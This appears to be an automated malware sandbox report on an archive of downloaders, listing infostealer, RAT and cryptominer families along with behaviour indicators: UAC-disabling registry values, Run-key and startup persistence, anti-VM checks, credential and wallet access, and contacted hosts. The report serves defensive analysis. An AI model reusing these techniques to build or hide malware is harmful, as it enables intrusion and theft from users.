Analysis Overview
SHA256
16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
Threat Level: Known bad
The file Downloaders.zip was found to be: Known bad.
Malicious Activity Summary
Lumma family
xmrig
Lumma Stealer, LummaC
Detect Xworm Payload
Xworm
Lokibot
Xmrig family
Suspicious use of NtCreateUserProcessOtherParentProcess
Xworm family
Lokibot family
UAC bypass
Identifies VirtualBox via ACPI registry values (likely anti-VM)
XMRig Miner payload
Uses browser remote debugging
Downloads MZ/PE file
Sets file to hidden
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Identifies Wine through registry keys
Unsecured Credentials: Credentials In Files
Reads user/profile data of web browsers
Loads dropped DLL
Checks BIOS information in registry
Drops startup file
Reads data files stored by FTP clients
Executes dropped EXE
Unexpected DNS network traffic destination
Checks computer location settings
Indicator Removal: File Deletion
Checks installed software on the system
Adds Run key to start application
Enumerates connected drives
Accesses Microsoft Outlook profiles
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Enumerates processes with tasklist
Suspicious use of NtSetInformationThreadHideFromDebugger
UPX packed file
Sets desktop wallpaper using registry
Suspicious use of SetThreadContext
Drops file in Windows directory
Drops file in Program Files directory
Unsigned PE
Access Token Manipulation: Create Process with Token
System Location Discovery: System Language Discovery
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
Browser Information Discovery
Program crash
Suspicious use of FindShellTrayWindow
outlook_office_path
Suspicious behavior: AddClipboardFormatListener
Enumerates system info in registry
Runs net.exe
Uses Task Scheduler COM API
Checks SCSI registry key(s)
Checks processor information in registry
Modifies data under HKEY_USERS
outlook_win_path
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Suspicious behavior: GetForegroundWindowSpam
Scheduled Task/Job: Scheduled Task
Suspicious use of SendNotifyMessage
Views/modifies file attributes
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-27 21:08
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-27 21:08
Reported
2024-11-27 21:13
Platform
win10v2004-20241007-en
Max time kernel
262s
Max time network
301s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Lokibot
Lokibot family
Lumma Stealer, LummaC
Lumma family
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 6508 created 3540 | N/A | C:\Users\Admin\Desktop\4363463463464363463463463\Files\rstxdhuj.exe | C:\Windows\Explorer.EXE |
| PID 6140 created 3540 | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winsvc.exe | C:\Windows\Explorer.EXE |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\reg.exe | N/A |
Xmrig family
Xworm
Xworm family
xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\New Text Document mod.exse\a\unik.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\unik.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\unik.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\4363463463464363463463463\Files\rstxdhuj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\4363463463464363463463463\Files\System.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\436346~1\Files\PORNHU~1.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\4363463463464363463463463\Files\exbuild.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\4363463463464363463463463\Files\pornhub_downloader.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\4363463463464363463463463\Files\._cache_System.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\4363463463464363463463463\Files\pornhub_downloader.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\4363463463464363463463463\Files\System.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Synaptics\Synaptics.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\stacktrace.vbs | C:\Windows\system32\taskmgr.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StackTrace.vbs | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winsvc.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk | C:\Users\Admin\Desktop\4363463463464363463463463\Files\._cache_System.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk | C:\Users\Admin\Desktop\4363463463464363463463463\Files\._cache_System.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine | C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine | C:\Users\Admin\Desktop\New Text Document mod.exse\a\unik.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 45.155.250.90 | N/A | N/A |
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\is-0D8G3.tmp\vcredist_x86.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ylrdnrwcx = "C:\\Users\\Admin\\AppData\\Roaming\\Ylrdnrwcx.exe" | C:\Users\Admin\Desktop\4363463463464363463463463\Files\rstxdhuj.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" | C:\Users\Admin\Desktop\4363463463464363463463463\Files\System.exe | N/A |
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\Mozilla\\Firefox\\Desktop Background.bmp" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\a\unik.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Common Files\Microsoft Shared\VC\msdia80.dll | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245852.0\x86_Microsoft.VC80.OpenMP_1fc8b3b9a1e18e3b_8.0.50727.6195_x-ww_452bf920.manifest | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245852.0\x86_Microsoft.VC80.OpenMP_1fc8b3b9a1e18e3b_8.0.50727.6195_x-ww_452bf920.cat | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\InstallTemp\20241127211245873.0 | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI824D.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245654.0\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.6195_x-ww_44262b86.manifest | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245779.0\x86_Microsoft.VC80.MFCLOC_1fc8b3b9a1e18e3b_8.0.50727.6195_x-ww_6a5bb789.cat | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\InstallTemp\20241127211245904.0 | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245654.0\msvcp80.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245779.0\x86_Microsoft.VC80.MFCLOC_1fc8b3b9a1e18e3b_8.0.50727.6195_x-ww_6a5bb789.manifest | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245779.0\mfc80CHT.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245633.0\ATL80.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245779.0\mfc80CHS.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245862.0\8.0.50727.6195.cat | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\InstallTemp\20241127211245862.0 | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\InstallTemp\20241127211245923.0 | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245714.0\x86_Microsoft.VC80.MFC_1fc8b3b9a1e18e3b_8.0.50727.6195_x-ww_150c9e8b.manifest | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245923.0\8.0.50727.6195.cat | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Tasks\Hkbsse.job | C:\Users\Admin\Desktop\4363463463464363463463463\Files\exbuild.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245654.0\msvcr80.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245779.0\mfc80KOR.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245862.0\8.0.50727.6195.policy | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245894.0\8.0.50727.6195.policy | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245894.0\8.0.50727.6195.cat | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\InstallTemp\20241127211245894.0 | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5b4a54.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245714.0\mfcm80u.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245923.0\8.0.50727.6195.policy | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5b4a58.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245779.0\mfc80DEU.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245779.0\mfc80FRA.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245904.0\8.0.50727.6195.policy | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245873.0\8.0.50727.6195.policy | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245633.0\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.6195_x-ww_a4c618fa.manifest | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245714.0\mfc80.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245779.0\mfc80ESP.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245779.0\mfc80ITA.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245714.0\x86_Microsoft.VC80.MFC_1fc8b3b9a1e18e3b_8.0.50727.6195_x-ww_150c9e8b.cat | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245779.0\mfc80JPN.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e5b4a54.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245654.0\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.6195_x-ww_44262b86.cat | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245714.0\mfc80u.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245654.0\msvcm80.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245714.0\mfcm80.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\InstallTemp\20241127211245852.0 | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245873.0\8.0.50727.6195.cat | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245904.0\8.0.50727.6195.cat | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\InstallTemp\20241127211245779.0 | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{710f4c1c-cc18-4c49-8cbf-51240c89a1a2} | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI603D.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\InstallTemp\20241127211245714.0 | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245852.0\vcomp.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\InstallTemp\20241127211245654.0 | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245633.0\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.6195_x-ww_a4c618fa.cat | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\WinSxS\InstallTemp\20241127211245779.0\mfc80ENU.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\InstallTemp\20241127211245633.0 | C:\Windows\system32\msiexec.exe | N/A |
Access Token Manipulation: Create Process with Token
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\System32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\System32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\System32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\System32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\System32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\System32\netsh.exe | N/A |
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Synaptics\Synaptics.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-VVJ18.tmp\GTA_V.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\System.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\main_v4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\papa_hr_build.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\exbuild.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\System.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\papa_hr_build.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-0D8G3.tmp\vcredist_x86.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\GTA_V.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\rstxdhuj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\436346~1\Files\PORNHU~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\rstxdhuj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\e5ac65e\TikTok18.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-L1Q0J.tmp\GTA_V.tmp | N/A |
